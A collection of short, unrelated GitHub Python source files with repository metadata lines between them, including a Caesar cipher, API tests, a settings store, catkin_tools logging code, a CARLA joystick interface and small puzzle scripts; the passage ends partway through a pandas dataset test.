    callers invoke this positionally so the rename is safe.  The helper's
    debug print of each intermediate code is also dropped.)
    """
    encrypted = []
    for letter in text:
        shifted = ord(letter) + key
        if shifted > 122:  # past 'z' (ord 122): wrap into a..z
            shifted = 96 + shifted % 122
        encrypted.append(chr(shifted))
    return "".join(encrypted)
def getNewLetter(letter, key):
    """Shift one lowercase letter forward by `key`, wrapping past 'z'.

    (The leftover debug print of the intermediate character code is
    removed; the return value is unchanged.)
    """
    codedletter = ord(letter) + key
    return chr(codedletter) if codedletter <= 122 else chr(96 + codedletter % 122)
# Demo: encrypt a sample string with a shift of 2 (prints "cdefcd").
string = "abcdab"
print(caesar_enc(string, 2))
| pro-ghanem/MY-DSA-Problem-Solving | String Manipulation/Caeser Encrypter.py | Caeser Encrypter.py | py | 1,006 | python | en | code | 0 | github-code | 36 |
75121574505 | import unittest
import requests
# Endpoint of the locally running segmentation service plus the sample
# image fixture used by the tests below.
URL = 'http://127.0.0.1:8000/segment'
IMAGE_PATH = './data/test_image/'
IMAGE_NAME = '0bf631128.jpg'
IMAGE_FORMAT = 'image/jpeg'
class ImageSegmentationTest(unittest.TestCase):
    """Black-box tests against a locally running segmentation service."""

    def test_image_segmentation(self):
        """A valid image upload returns 200 and a segmented image."""
        headers = {'accept': 'application/json'}
        with open(IMAGE_PATH + IMAGE_NAME, 'rb') as image_file:
            files = {'file': (IMAGE_NAME, image_file.read(), IMAGE_FORMAT)}
        response = requests.post(URL, headers=headers, files=files)
        self.assertEqual(response.status_code, 200)
        self.assertIn("segmented_image", response.json())

    def test_missing_image_file(self):
        """Omitting the file part yields a 422 validation error."""
        response = requests.post(URL, headers={'accept': 'application/json'}, files={})
        self.assertEqual(response.status_code, 422)
if __name__ == '__main__':
    # Allow running this module directly with the standard unittest runner.
    unittest.main()
| MykytaKyt/airbus-ship-detection | tests/test_app.py | test_app.py | py | 994 | python | en | code | 0 | github-code | 36 |
25842561969 | from sqlalchemy import ForeignKey, Table, Column
from sqlalchemy.sql.sqltypes import Integer, String, Float, Boolean, Date
from config.db import meta, engine
# Schema for the `castings` table: one row per casting session, with
# foreign keys into `people` for the casting director and the director.
castings = Table("castings", meta,
                 Column("id", Integer, primary_key=True),
                 Column("castingDate", Date),
                 Column("name", String(255)),
                 Column("castingDirector", Integer, ForeignKey("people.id")),
                 Column("director", Integer, ForeignKey("people.id")),
                 Column("inPerson", Boolean),
                 Column("inProcess", Boolean),
                 Column("notes", String(355)))
meta.create_all(engine) | Lorea13/Profesionales-del-Arte | backend/models/casting.py | casting.py | py | 554 | python | en | code | 0 | github-code | 36 |
2112950145 | import json
class SettingFile(object):
    """A JSON-backed settings store with per-setting change callbacks.

    Settings are restricted to the keys present in `defaults`; every
    successful write fires that setting's callbacks and saves the file.

    Fixes over the original: the bare `except:` in load() (which swallowed
    everything, including KeyboardInterrupt) is narrowed to the errors
    open()/json.load() actually raise, and the file handles leaked by
    `json.load(open(...))` / `json.dump(..., open(...))` are closed via
    context managers.
    """

    def __init__(self, path, defaults):
        self._defaults = defaults
        self._path = path
        self._data = dict()
        self._callbacks = dict()
        for setting in defaults:
            self._callbacks[setting] = callback_assist()
        self.load()

    def load(self):
        '''Attempts to load the file, falling back to the defaults'''
        try:
            with open(self._path) as fp:
                new_data = json.load(fp)
        except (OSError, ValueError):
            # Missing or corrupt file: write the defaults out and use them.
            # (json.JSONDecodeError is a subclass of ValueError.)
            with open(self._path, 'w') as fp:
                json.dump(
                    self._defaults,
                    fp,
                    indent=2,
                    sort_keys=True
                )
            new_data = self._defaults.copy()
        # Assign through __setitem__ so callbacks fire for every setting,
        # matching the original behavior.
        for setting in self._defaults:
            if setting in new_data:
                self[setting] = new_data[setting]
            else:
                self[setting] = self._defaults[setting]

    def save(self):
        """Write the current settings to disk as pretty-printed JSON."""
        with open(self._path, 'w') as fp:
            json.dump(
                self._data,
                fp,
                indent=2,
                sort_keys=True
            )

    def register_callback(self, setting_name, funct, args=None):
        """Call `funct(*args)` whenever `setting_name` is written."""
        self._callbacks[setting_name].add_callback(funct, args)

    def __getitem__(self, *args):
        # dict.get semantics: returns None (or a supplied default) when unset.
        return self._data.get(*args)

    def __setitem__(self, key, val):
        if key not in self._defaults:
            raise ValueError('Unknown Setting')
        self._data[key] = val
        self._callbacks[key].fire()
        self.save()

    def __str__(self):
        return "Settings in {}: {}".format(self._path, self._data)

    def __repr__(self):
        return "setting_file({}, {})".format(self._path, self._defaults)
class callback_assist(object):
    '''Collects (function, arguments) pairs and invokes them on demand.'''

    def __init__(self):
        self.callbacks = list()

    def add_callback(self, funct, args=None):
        '''Registers `funct` to be called with `args` when fire() runs'''
        self.callbacks.append((funct, list() if args is None else args))

    def fire(self):
        '''Invokes every registered callback in registration order'''
        for funct, args in self.callbacks:
            funct(*args)
| sdfgeoff/newsscroller | setting_file.py | setting_file.py | py | 2,100 | python | en | code | 0 | github-code | 36 |
22541773169 | # RA, 2020-10-13
import contextlib
import io
@contextlib.contextmanager
def open_maybe_gz(file, *, mode='r'):
    """
    Open `file` for reading; it may be a file object, a path to a plain
    file, or a path to a gzipped file.

    `mode` must be 'r' or 'rb' and has to be specified.

    Usage:
        with open_maybe_gz(path_to_file, mode='r') as fd:
            print(fd.read())
    """
    assert mode in ['r', 'rb']

    # Already an open file object: hand it back untouched.
    if isinstance(file, io.IOBase):
        yield file
        return

    from pathlib import Path
    assert Path(file).is_file()
    file = str(file)

    if not file.endswith(".gz"):
        with open(file, mode=mode) as fd:
            yield fd
        return

    # Gzipped path: decompress transparently, wrapping in a text layer
    # when the caller asked for 'r'.
    import gzip
    with gzip.open(file, mode='rb') as fd:
        yield io.TextIOWrapper(fd) if mode == 'r' else fd
| Luca-Blum/Computational_Biomedicine | project1/solution/humdum/io/gz.py | gz.py | py | 891 | python | en | code | 0 | github-code | 36 |
37980420317 | import random
from enum import Enum
# Reaction image filenames, grouped by game system (D&D 5e vs SW5E) and
# by roll quality; get_good_reaction/get_bad_reaction resolve full paths.
fifth_ed_bad_reactions = ["cringe.jpg", "mike.jpg", "nat1.gif", "nat1.jpg", "jazz.jpg"]
fifth_ed_good_reactions = ["heisenberg.gif", "joji.jpg", "mcmahon.gif", "nat20.jpg"]
sw_bad_reactions = ["bad1.gif", "bad2.gif", "bad3.gif", "bad4.gif",
                    "bad5.gif", "bad6.jpg", "bad7.jpg", "bad8.jpg", "bad9.gif", "bad10.gif"]
sw_good_reactions = ["good1.gif", "good2.gif", "good3.gif",
                     "good4.gif", "good5.gif", "good6.gif", "good7.gif", "good8.gif"]
class GameMode(Enum):
    """Rule systems the bot can serve reaction images for."""
    WIZARDS_FIFTH_ED = 1
    STAR_WARS_FIFTH_ED = 2
def get_good_reaction(current_gamemode):
    """Return the path of a random 'good roll' reaction image for the gamemode.

    Fix: the original always drew a 5e image first and discarded it for
    Star Wars games (a wasted random.choice call); draw only from the
    matching pool.
    """
    if current_gamemode == GameMode.STAR_WARS_FIFTH_ED:
        return "resources/reactions/sw5e/good/" + random.choice(sw_good_reactions)
    return "resources/reactions/5e/good/" + random.choice(fifth_ed_good_reactions)
def get_bad_reaction(current_gamemode):
    """Return the path of a random 'bad roll' reaction image for the gamemode.

    Fix: the original always drew a 5e image first and discarded it for
    Star Wars games (a wasted random.choice call); draw only from the
    matching pool.
    """
    if current_gamemode == GameMode.STAR_WARS_FIFTH_ED:
        return "resources/reactions/sw5e/bad/" + random.choice(sw_bad_reactions)
    return "resources/reactions/5e/bad/" + random.choice(fifth_ed_bad_reactions)
| SPIGS/DiceBot | gamemode.py | gamemode.py | py | 1,148 | python | en | code | 1 | github-code | 36 |
30810878899 |
import serial
import KeyConfig as kc
import struct
import socket
# UDP endpoint that receives the packed color/command packets.
IP = '192.168.1.200'
PORT = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setblocking(False)  # non-blocking socket
def read_data():
    """Read one line from the serial port and strip its CRLF terminator.

    Returns the decoded line, or None implicitly when nothing was read.
    NOTE(review): relies on the module-level `ser` created in the
    __main__ block; confirm this is only called after that setup.
    """
    d: bytes = ser.readline()
    if len(d) > 0:
        res = d.decode().replace('\r\n', '')
        return res
def send_color_data(color: tuple):
    """Send a color as four packed floats over UDP (alpha forced to 1)."""
    payload = struct.pack("4f", *color, 1)
    s.sendto(payload, (IP, PORT))
    print(f"send: {payload}")
def send_command_data(command: float):
    """Send a single command value as one packed float over UDP."""
    payload = struct.pack("f", command)
    s.sendto(payload, (IP, PORT))
    print(f"send: {payload}")
if __name__ == '__main__':
    # Forward key codes read from the serial device to UDP, as either a
    # color or a command packet depending on the KeyConfig lookup tables.
    ser = serial.Serial('COM5', 9600)
    while True:
        data: bytes = ser.read_until(expected=b"\r\n")
        data = data.replace(b"\r\n", b'')
        int_data = int.from_bytes(data, byteorder="big")
        print(int_data)
        if len(data) > 0:
            if kc.colors.get(int_data):
                print("ok")
                color_to_send = kc.colors[int_data]
                send_color_data(color_to_send)
            elif kc.commands.get(int_data):
                print("command")
                command_to_send = kc.commands[int_data]
                send_command_data(command_to_send)
| AssoAndrea/UE-ArduinoLightController | PythonMiddleware/main.py | main.py | py | 1,249 | python | en | code | 1 | github-code | 36 |
37877826411 | import os
import re
import shutil
from glob import glob
from osrf_pycommon.process_utils import AsyncSubprocessProtocol
from catkin_tools.common import mkdir_p
from catkin_tools.terminal_color import fmt
from .events import ExecutionEvent
MAX_LOGFILE_HISTORY = 10
class IOBufferContainer(object):
    """A simple buffer container for use in logging.

    This class will open a logfile for a given job stage and write to it
    continuously while receiving stdout and stderr.
    """

    def __init__(self, label, job_id, stage_label, event_queue, log_path):
        """Open `<log_path>/<job_id>/<label>.<stage_label>.log` for writing."""
        self.label = label
        self.job_id = job_id
        self.stage_label = stage_label
        self.event_queue = event_queue
        self.log_path = log_path
        self.is_open = False
        self.stdout_buffer = b""
        self.stderr_buffer = b""
        self.interleaved_buffer = b""

        # Construct the logfile path for this job and stage
        logfile_dir_path = os.path.join(log_path, self.job_id)
        self.logfile_basename = os.path.join(logfile_dir_path, '.'.join([self.label, self.stage_label]))
        self.logfile_name = '{}.log'.format(self.logfile_basename)

        # Create the logfile dir if it doesn't exist
        if not os.path.exists(logfile_dir_path):
            mkdir_p(logfile_dir_path)

        # Get the existing number of logfiles
        # TODO: Make this number global across all build stages
        existing_logfile_indices = sorted([int(lf.split('.')[-2])
                                           for lf in glob('{}.*.log'.format(self.logfile_basename))])
        if len(existing_logfile_indices) == 0:
            self.logfile_index = 0
        else:
            self.logfile_index = 1 + existing_logfile_indices[-1]

        # Generate the logfile name (index zero-padded to 3 digits)
        self.unique_logfile_name = '{}.{:0>{}}.log'.format(self.logfile_basename, self.logfile_index, 3)

        # Remove colliding file if necessary
        if os.path.exists(self.logfile_name):
            os.unlink(self.logfile_name)

        # Open logfile
        self.log_file = open(self.logfile_name, 'wb')
        self.is_open = True

    def close(self):
        """Close the logfile, archive it under its unique name, and prune history."""
        # Close logfile
        self.log_file.close()
        self.is_open = False

        # Copy logfile to unique name
        shutil.copy(self.logfile_name, self.unique_logfile_name)

        # Remove older logfiles (keep at most MAX_LOGFILE_HISTORY indices)
        for logfile_name in glob('{}.*.log'.format(self.logfile_basename)):
            if (self.logfile_index - int(logfile_name.split('.')[-2])) >= MAX_LOGFILE_HISTORY:
                os.unlink(logfile_name)

        # Save output from stderr (these don't get deleted until cleaning the logfile directory)
        if len(self.stderr_buffer) > 0:
            with open(self.unique_logfile_name + '.stderr', 'wb') as logfile:
                logfile.write(self.stderr_buffer)

    def get_interleaved_log(self):
        """get decoded interleaved log."""
        # The except branch is defensive: _decode uses errors='replace',
        # which does not raise UnicodeDecodeError.
        try:
            return self._decode(self.interleaved_buffer)
        except UnicodeDecodeError:
            return "interleaved_log: some output cannot be displayed.\n"

    def get_stdout_log(self):
        """get decoded stdout log."""
        try:
            return self._decode(self.stdout_buffer)
        except UnicodeDecodeError:
            return "stdout_log: some output cannot be displayed.\n"

    def get_stderr_log(self):
        """get decoded stderr log."""
        try:
            return self._decode(self.stderr_buffer)
        except UnicodeDecodeError:
            return "stderr_log: some output cannot be displayed.\n"

    @staticmethod
    def _encode(data):
        """Encode a Python str into bytes.

        :type data: str
        """
        return data.encode('utf8')

    @staticmethod
    def _decode(data):
        """Decode bytes into Python str.

        :type data: bytes
        """
        return data.decode('utf-8', 'replace')

    def __del__(self):
        # Best-effort close if the owner never called close() explicitly.
        if self.is_open:
            self.close()

    @classmethod
    def factory(cls, label, job_id, stage_label, event_queue, log_path):
        """Factory method for constructing with job metadata."""
        def init_proxy(*args, **kwargs):
            return cls(label, job_id, stage_label, event_queue, log_path, *args, **kwargs)
        return init_proxy
class IOBufferLogger(IOBufferContainer):
    """This is a logging class to be used instead of sys.stdout and sys.stderr
    in FunctionStage operations.

    This class also generates `stdout` and `stderr` events.
    """

    def __init__(self, label, job_id, stage_label, event_queue, log_path, *args, **kwargs):
        IOBufferContainer.__init__(self, label, job_id, stage_label, event_queue, log_path)

    def out(self, data, end='\n'):
        """Record `data` as stdout: buffer it, log it, and emit a STDOUT event.

        :type data: str
        :type end: str
        """
        # Buffer the encoded data
        data += end
        encoded_data = self._encode(data)
        self.stdout_buffer += encoded_data
        self.interleaved_buffer += encoded_data

        # Save the encoded data
        self.log_file.write(encoded_data)

        # Emit event with decoded Python str
        self.event_queue.put(ExecutionEvent(
            'STDOUT',
            job_id=self.job_id,
            stage_label=self.stage_label,
            data=data))

    def err(self, data, end='\n'):
        """Record `data` as stderr: buffer it, log it, and emit a STDERR event.

        :type data: str
        :type end: str
        """
        # Buffer the encoded data
        data += end
        encoded_data = self._encode(data)
        self.stderr_buffer += encoded_data
        self.interleaved_buffer += encoded_data

        # Save the encoded data
        self.log_file.write(encoded_data)

        # Emit event with decoded Python str
        self.event_queue.put(ExecutionEvent(
            'STDERR',
            job_id=self.job_id,
            stage_label=self.stage_label,
            data=data))
class IOBufferProtocol(IOBufferContainer, AsyncSubprocessProtocol):
    """An asyncio protocol that collects stdout and stderr.

    This class also generates `stdout` and `stderr` events.

    Since the underlying asyncio API constructs the actual protocols, this
    class provides a factory method to inject the job and stage information
    into the created protocol.
    """

    def __init__(self, label, job_id, stage_label, event_queue, log_path, *args, **kwargs):
        IOBufferContainer.__init__(self, label, job_id, stage_label, event_queue, log_path)
        AsyncSubprocessProtocol.__init__(self, *args, **kwargs)
        # Partial (not yet newline-terminated) output is parked here until
        # the rest of the line arrives or the process exits.
        self.intermediate_stdout_buffer = b''
        self.intermediate_stderr_buffer = b''

    @staticmethod
    def _split(data):
        """Split `data` into (complete lines, trailing partial line).

        The first element ends at the last newline (inclusive); the second
        is whatever follows it. With no newline at all, everything is
        considered partial.
        """
        try:
            last_break = data.rindex(b'\n') + 1
            return data[0:last_break], data[last_break:]
        except ValueError:
            return b'', data

    def on_stdout_received(self, data):
        """
        :type data: encoded bytes
        """
        self._relay(data, 'STDOUT', 'stdout_buffer', 'intermediate_stdout_buffer')

    def on_stderr_received(self, data):
        """
        :type data: encoded bytes
        """
        self._relay(data, 'STDERR', 'stderr_buffer', 'intermediate_stderr_buffer')

    def _relay(self, data, event_type, buffer_attr, intermediate_attr):
        """Shared implementation of the two on_*_received callbacks.

        Complete lines are appended to the per-stream and interleaved
        buffers, written to the log file, and emitted as an event; the
        trailing partial line is parked in the intermediate buffer.
        """
        complete, partial = self._split(getattr(self, intermediate_attr) + data)
        setattr(self, intermediate_attr, partial)
        setattr(self, buffer_attr, getattr(self, buffer_attr) + complete)
        self.interleaved_buffer += complete
        self.log_file.write(complete)
        # Emit event with decoded Python str (possibly empty if this chunk
        # completed no line, matching the original behavior).
        self.event_queue.put(ExecutionEvent(
            event_type,
            job_id=self.job_id,
            stage_label=self.stage_label,
            data=self._decode(complete)))

    def on_process_exited2(self, returncode):
        """
        Dump anything remaining in the intermediate buffers.

        Bug fix: the original called on_*_received(intermediate + b'\\n'),
        but those callbacks prepend the intermediate buffer themselves, so
        the final partial line was emitted twice (e.g. b'abc' flushed as
        'abcabc'). Feeding just a terminating newline flushes it once.
        """
        if len(self.intermediate_stdout_buffer) > 0:
            self.on_stdout_received(b'\n')
        if len(self.intermediate_stderr_buffer) > 0:
            self.on_stderr_received(b'\n')
class CatkinTestResultsIOBufferProtocol(IOBufferProtocol):
    """An IOBufferProtocol which parses the output of catkin_test_results"""

    def on_stdout_received(self, data):
        # Decode the chunk and colorize any summary line of the form
        # "<name>: N tests, N errors, N failures, N skipped" before
        # forwarding everything to the base protocol.
        lines = data.decode().splitlines()
        clines = []
        for line in lines:
            match = re.match(r'(.*): (\d+) tests, (\d+) errors, (\d+) failures, (\d+) skipped', line)
            if match:
                # `fmt` presumably expands the @!/@{rf}/@{kf} markers into
                # terminal color codes, leaving the {} slots for .format()
                # -- TODO(review): confirm against catkin_tools' fmt helper.
                line = fmt('@!{}@|: {} tests, @{rf}{} errors@|, @{rf}{} failures@|, @{kf}{} skipped@|')
                line = line.format(*match.groups())
            clines.append(line)
        # NOTE(review): re-joining with '\n' and appending one newline does
        # not preserve the chunk's original trailing-newline structure.
        cdata = '\n'.join(clines) + '\n'
        super(CatkinTestResultsIOBufferProtocol, self).on_stdout_received(cdata.encode())
| catkin/catkin_tools | catkin_tools/execution/io.py | io.py | py | 9,125 | python | en | code | 153 | github-code | 36 |
def find_Team(t, n, l):
    """Accumulate into `t` the heap-style subtree indices of node `n`.

    Children of node n are 2n+1 and 2n+2; descent stops at indices >= l.
    Quirks preserved from the original: an initial call with n > l
    returns the bare int l (not a list), and n == l appends l first.
    """
    if n > l:
        return l
    if n == l:
        t.append(l)
    for child in (2 * n + 1, 2 * n + 2):
        if child < l:
            t.append(child)
            find_Team(t, child, l)
    return t
def compare(n, m):
    """Compare the total power of two teams.

    `n` and `m` are lists of indices into the module-level `power`
    list; returns "<root1><op><root2>" where op is '>', '<' or '='.
    """
    strength_a = sum(power[i] for i in n)
    strength_b = sum(power[j] for j in m)
    if strength_a > strength_b:
        return f"{n[0]}>{m[0]}"
    if strength_a < strength_b:
        return f"{n[0]}<{m[0]}"
    return f"{n[0]}={m[0]}"
# Read one line of the form "<powers>/<matches>": powers are
# space-separated ints; matches are comma-separated pairs of root indices.
power, order = input('Enter Input : ').split('/')
power = [int(i) for i in power.split()]
print(sum(power))
for e in order.split(','):
    # Each match names two root nodes; their teams are the subtrees
    # rooted there (heap indexing), compared by total power.
    a, b = [int(i) for i in e.split()]
    team1 = find_Team([a], a, len(power))
    team2 = find_Team([b], b, len(power))
print(compare(team1, team2)) | PPZeen/OODS_Exersice | Tree/tree2_4.py | tree2_4.py | py | 805 | python | en | code | 0 | github-code | 36 |
23155147064 | import logging
import os
from datetime import datetime
# Timestamped log file name, e.g. "05_07_2024_13_45_12.log".
file_name = f"{datetime.now().strftime('%d_%m_%Y_%H_%M_%S')}.log"

# Bug fix: the original ran os.makedirs() on logs/<file_name>, creating a
# *directory* named after the log file and then nesting the real log file
# inside it. Create only the "logs" directory and place the file in it.
logs_path = os.path.join(os.getcwd(), "logs")
os.makedirs(logs_path, exist_ok=True)
logs_file_path = os.path.join(logs_path, file_name)

logging.basicConfig(filename=logs_file_path,
                    format="[%(asctime)s] %(lineno)d %(name)s-%(levelname)s-%(message)s",
                    level=logging.INFO)
#if __name__=="__main__":
# logging.info("logging started") | Hema9121/second-hema-ml-repo | src/logger.py | logger.py | py | 500 | python | en | code | 0 | github-code | 36 |
27930609748 | # Sum of even-valued fibonacci numbers less than or equal to 4 million
def fibonacci(n):
    """Return the n-th Fibonacci number (F(0) = 0, F(1) = 1).

    Rewritten iteratively: the original naive double recursion took
    exponential time, which matters when called in a loop up to n = 33.
    For n <= 1 the argument itself is returned, matching the original.
    """
    if n <= 1:
        return n
    a, b = 0, 1
    for _ in range(n - 1):
        a, b = b, a + b
    return b
# Project Euler #2: sum the even Fibonacci numbers that do not exceed
# four million. The original hard-coded range(34) (F(33) = 3,524,578 is
# the last term <= 4,000,000) and recomputed each term with exponential
# recursion; iterating the pair (a, b) against the limit itself is O(n)
# and true to the problem statement, with identical output.
total = 0
a, b = 0, 1
while a <= 4000000:
    if a % 2 == 0:
        total = total + a
    a, b = b, a + b
print(total)
| vandervel/Project-Euler-Problems | solutions/problem2.py | problem2.py | py | 328 | python | en | code | 0 | github-code | 36 |
def read_inputs(input_file):
    """Read an Advent-of-Code day-2 command file.

    Each line looks like "forward 5"; returns a list of
    [direction, magnitude] pairs with the magnitude as int.
    """
    commands = []
    with open(input_file, 'r') as handle:
        for raw_line in handle.read().splitlines():
            tokens = raw_line.split(" ")
            commands.append([tokens[0], int(tokens[1])])
    return commands
def pilot(input):
    """Apply AoC 2021 day-2 part-2 steering rules to a command list.

    "down"/"up" adjust aim; "forward" advances horizontally by the
    magnitude and dives by aim * magnitude.

    Returns (horizontal_position, depth).
    """
    horiz_pos, depth, aim = 0, 0, 0
    for cmd in input:
        direction, amount = cmd[0], cmd[1]
        if direction == "forward":
            horiz_pos += amount
            depth += aim * amount
        elif direction == "down":
            aim += amount
        elif direction == "up":
            aim -= amount
    return horiz_pos, depth
if __name__ == "__main__":
    # NOTE(review): hard-coded absolute path only exists on the original
    # author's machine; parameterize before reuse.
    input_file = "/Users/brad/github/advent2021/input2.txt"
    input = read_inputs(input_file)
    print(input)
    horiz_pos, depth = pilot(input)
print(horiz_pos, depth, horiz_pos*depth) | brad-trantham/adventofcode2021 | src/pilot.py | pilot.py | py | 820 | python | en | code | 0 | github-code | 36 |
73971404584 | from scripts.util.joystick import Joystick
from carla_env import CarlaEnv
from wrapped_carla_env import BiasedAction
import time
import carla
import pygame
import numpy as np
class ManualInterface:
    """Pygame-based manual driving UI for a CarlaEnv.

    Polls joysticks for per-car [accel, steer] actions, steps the
    environment, and draws each car's camera views together with its
    running reward total.
    """

    def __init__(self, env: CarlaEnv):
        # create env
        self.env = env
        self.obs = None  # latest observation: per-car list of camera images
        self.rew = None  # latest per-car reward
        self.done = False
        self.reset_env()
        self.total_reward = None  # accumulated reward per car (np.ndarray)

        # init pygame
        pygame.init()
        self.running = True
        self.surface = None  # display surface, created lazily on first render

        # font
        self.font = pygame.font.Font(pygame.font.get_default_font(), 30)

        # control
        self.joysticks = None  # opened lazily in get_action()
        self.reset_flag = False  # debounces the reset button

        # tps counter
        self.tps_total_time = 0
        self.tps_total_frame = 0

    def __del__(self):
        # Tear down pygame when the UI object is collected.
        pygame.quit()

    def reset_env(self):
        """Reset the environment and clear per-episode bookkeeping."""
        self.obs = self.env.reset()
        self.rew = None
        self.done = False
        self.total_reward = None

    def get_action(self):
        """Poll joysticks and return one [accel, steer] action per stick.

        Also resets the environment (debounced via reset_flag) when the
        Y button is pressed on any stick or the episode reported done.
        """
        # init joysticks
        if self.joysticks is None:
            self.joysticks = [Joystick(fn) for fn in Joystick.list_devices()]

        # pump events before get
        pygame.event.pump()

        # get joysticks
        act = []
        for js in self.joysticks:
            accel = -js.axes["ry"]  # Left lever, L <--> R
            steer = js.axes["x"]  # Right lever, U <--> D
            reverse = js.buttons["tl"]  # LB
            # NOTE(review): `reverse` is only consumed by the commented-out
            # carla.VehicleControl path below; it is currently unused.
            # act.append(carla.VehicleControl(
            #     throttle=max(0.0, accel),
            #     brake=-min(0.0, accel),
            #
            #     steer=steer,
            #     reverse=reverse
            # ))
            act.append(np.array([accel, steer], dtype=np.float32))

        # check if reset
        is_reset = sum([js.buttons["y"] for js in self.joysticks])
        is_reset |= self.done
        if is_reset:
            if not self.reset_flag:
                self.reset_env()
                self.reset_flag = True
        else:
            self.reset_flag = False

        return act

    def on_event(self, event):
        """Handle a single pygame event (currently only window close)."""
        if event.type == pygame.QUIT:
            self.running = False
            return

    def on_update(self):
        """Step the environment once; update reward totals and TPS stats."""
        # update env
        act = self.get_action()
        start_time = time.time()
        self.obs, self.rew, self.done, _, = self.env.step(act)
        elapsed = time.time() - start_time

        # update total reward
        if self.total_reward is None:
            self.total_reward = np.array(self.rew)
        else:
            self.total_reward += np.array(self.rew)

        # tps counter: prints steps-per-second over 100-step windows
        self.tps_total_time += elapsed
        self.tps_total_frame += 1
        if self.tps_total_frame >= 100:
            print("TPS: {}".format(self.tps_total_frame / self.tps_total_time))
            self.tps_total_frame = 0
            self.tps_total_time = 0

    def on_render(self):
        """Draw every car's camera images in a grid plus its reward text."""
        # Observations are channel-first images: (C, H, W).
        _, h, w = self.obs[0][0].shape

        # init surface
        if self.surface is None:
            n_cars = len(self.obs)
            n_cameras = len(self.obs[0])
            self.surface = pygame.display.set_mode((w * n_cameras, h * n_cars), pygame.HWSURFACE | pygame.DOUBLEBUF)

        # show images
        y = 0
        for cam, rew in zip(self.obs, self.total_reward):
            # draw car cam images
            x = 0
            for cam_img in cam:
                if cam_img.shape[0] < 3:
                    # pad channel
                    # NOTE(review): pads exactly one extra channel, which
                    # assumes 2-channel images whenever C < 3 -- confirm.
                    padded_cam_img = np.concatenate([
                        cam_img,
                        np.zeros((1, *cam_img.shape[1:]), dtype=cam_img.dtype)], axis=0)
                else:
                    padded_cam_img = cam_img
                cam_surf = pygame.surfarray.make_surface(padded_cam_img.transpose(2, 1, 0))
                self.surface.blit(cam_surf, (x, y))
                x += w
            # draw reward
            rew_surf = self.font.render("Reward: {:.2f}".format(rew), True, (0, 0, 255))
            self.surface.blit(rew_surf, (10, y + 10))
            y += h

        # update display
        pygame.display.update()

    def run(self, fps: int = None):
        """Main loop: dispatch events, step, render; cap at `fps` if given."""
        clock = pygame.time.Clock()
        while self.running:
            for event in pygame.event.get():
                self.on_event(event)
            self.on_update()
            self.on_render()
            if fps:
                clock.tick(fps)
def main():
    """Run the manual-control UI against a single local CarlaEnv."""
    dt = 0.1
    global_options = {
        "world": {
            "dt": dt
        }
    }
    env = CarlaEnv(global_options, 0)
    ui = ManualInterface(env)
    # Cap the UI loop at the simulation rate (1 / dt frames per second).
    ui.run(int(1.0 / dt))


if __name__ == '__main__':
    main()
| imoneoi/carla_env | scripts/manual_control.py | manual_control.py | py | 4,642 | python | en | code | 3 | github-code | 36 |
8785489698 | import gymnasium as gym
from IPython import display
import matplotlib.pyplot as plt
from utils.visualize import visualize_policy, visualize_q, visualize_model, visualize_v
class JupyterRender(gym.Wrapper):
    """Gym wrapper that renders FrozenLake frames inside a Jupyter cell.

    render() draws the environment image on a 2x2 matplotlib grid and
    adds optional panels for values, Q-values, the policy, and learned
    models, streaming the figure through IPython display.
    """

    def __init__(self, env):
        super().__init__(env)
        self.env = env

    def render(self, title='Environment', v=None, q=None, policy=None, model_r=None, model_ns=None):
        """Render the environment plus any supplied diagnostic panels.

        :param title: subplot title for the environment frame
        :param v: state values to draw (optional)
        :param q: action values to draw (optional)
        :param policy: policy to draw (optional)
        :param model_r: learned reward model to draw (optional)
        :param model_ns: learned next-state model to draw (optional)
        """
        # Keep only the panels that were actually passed in.
        viz_list = {}
        if v is not None:
            viz_list['v'] = v
        if q is not None:
            viz_list['q'] = q
        if policy is not None:
            viz_list['policy'] = policy
        if model_r is not None:
            viz_list['model_r'] = model_r
        if model_ns is not None:
            viz_list['model_ns'] = model_ns

        fig = plt.figure(figsize=(8, 8))
        ax_list = [fig.add_subplot(2, 2, 1)]
        img = ax_list[0].imshow(self.env.render()) # prepare to render the environment by using matplotlib and ipython display
        ax_list[0].set_title(title)
        # Allocate one extra subplot per requested panel.
        # NOTE(review): the 2x2 grid leaves room for at most 3 extra
        # panels; supplying more would exceed the grid -- confirm intended.
        pos = 2
        for i in range(pos, 2 + len(viz_list)):
            ax_list.append(fig.add_subplot(2, 2, i))
        ax_index = 1
        for key, value in viz_list.items():
            if key == 'policy':
                visualize_policy(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
            elif key == 'v':
                visualize_v(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
            elif key == 'q':
                visualize_q(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
            else:
                # Both model panels share one drawing routine; pick a title.
                if key == 'model_r':
                    title = 'Reward Model'
                elif key == 'model_ns':
                    title = 'Next State Model'
                visualize_model(value, ax_list[ax_index], self.env.nrow, self.env.ncol, title)
            ax_index += 1
        # Hide ticks and labels on every subplot.
        for ax in ax_list:
            ax.tick_params(bottom=False, left=False, labelbottom=False, labelleft=False)
        # Stream the frame to the notebook, replacing the previous one.
        display.display(plt.gcf())
        display.clear_output(wait=True)
        plt.close()
if __name__ == '__main__':
    # Smoke test: build a deterministic 4x4 FrozenLake and wrap it.
    env = gym.make("FrozenLake-v1", render_mode='rgb_array', is_slippery=False) # define the environment.
    env = JupyterRender(env)
| moripiri/Reinforcement-Learning-on-FrozenLake | utils/wrapper.py | wrapper.py | py | 2,250 | python | en | code | 4 | github-code | 36 |
34092269946 | # To be filled by students
import unittest
import pandas as pd
import sys
import os
from pandas._libs.missing import NA
from pandas.util.testing import assert_frame_equal
if os.path.abspath(".") not in sys.path: sys.path.append(os.path.abspath("."))
from src.data import Dataset
class TestDataset(unittest.TestCase):
    """Tests for src.data.Dataset metadata accessors.

    NOTE(review): setUp downloads a CSV over the network on every test,
    and the expected row/column counts (58 x 18) assume the remote file
    never changes -- consider vendoring a local fixture.
    """

    def setUp(self):
        # JHU CSSE US daily report for 2021-01-01, used as the fixture.
        self.data=pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports_us/01-01-2021.csv')

    def tearDown(self):
        # Drop the fixture between tests.
        del self.data

    def test_get_name(self):
        # get_name() should echo the name passed at construction.
        df1=pd.DataFrame(self.data)
        data=Dataset(name='01-01-2021.csv',df=df1)
        expected='01-01-2021.csv'
        result=data.get_name()
        self.assertEqual(result,expected)

    def test_get_n_rows(self):
        # The 2021-01-01 report is expected to contain 58 rows.
